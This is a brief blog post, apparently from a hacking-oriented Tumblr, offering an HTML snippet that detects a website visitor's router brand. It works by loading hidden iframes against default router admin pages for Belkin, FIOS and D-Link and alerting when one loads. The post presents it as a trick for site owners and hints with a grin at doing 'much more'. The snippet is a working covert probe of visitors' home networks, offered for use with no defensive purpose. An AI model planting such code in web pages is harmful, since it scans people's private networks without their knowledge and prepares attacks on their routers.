reasonblog-blog
reasonblog-blog
Reason
1 post
A blog dedicated to hacking open hardware, getting into software, and general technical resources for network engineers.
Don't wanna be here? Send us removal request.
reasonblog-blog · 12 years ago
Text
Detect Website's Visitor's Router Brand via Javascript & HTML
Here is a cool piece of code that can tell you what router your visitor has. How it works it detects what the default config page of the router is and then alerts the user. Obviously you could do much more if you wanted to >:)
Belkin
<iframe style="visibility: hidden" onload="alert('detected Belkin!')" src="http://192.168.2.1/setup.cgi?next_file=wls_chan.html"></iframe>
FIOS
<iframe style="visibility: hidden" onload="alert('detected FIOS!')" src="http://192.168.1.1/index.cgi"></iframe>
D-Link
<iframe style="visibility: hidden" onload="alert('detected D-Link!')" src="http://192.168.0.1/Advanced/Virtual_Server.shtml"></iframe>
Credit: Samy Kamkar (He probably got it from another source)
1 note · View note